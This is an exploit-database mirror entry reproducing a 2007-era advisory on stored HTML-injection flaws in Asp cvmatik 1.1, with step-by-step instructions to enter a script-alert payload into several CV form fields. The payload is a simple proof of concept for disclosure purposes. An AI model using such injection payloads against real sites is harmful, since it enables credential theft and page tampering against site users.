exploit-db-mirror/platforms/asp/webapps/30331.html
Offensive Security 30d9cc4c3d Updated 01_04_2014
2014-01-04 23:27:58 +00:00

28 lines
No EOL
920 B
HTML
Executable file

source: http://www.securityfocus.com/bid/25008/info
Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Asp cvmatik 1.1 is vulnerable.
<html><head></head><body>1-http://www.example.com/cv.asp
You write xss code in page's text box
Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet <script>alert("G3");</script>
or
Askerlik <script>alert("G3");</script>
or
GSM <script>alert("G3");</script>
etc...
Press to "tamam"(ok) button.
2-next page
</body></html>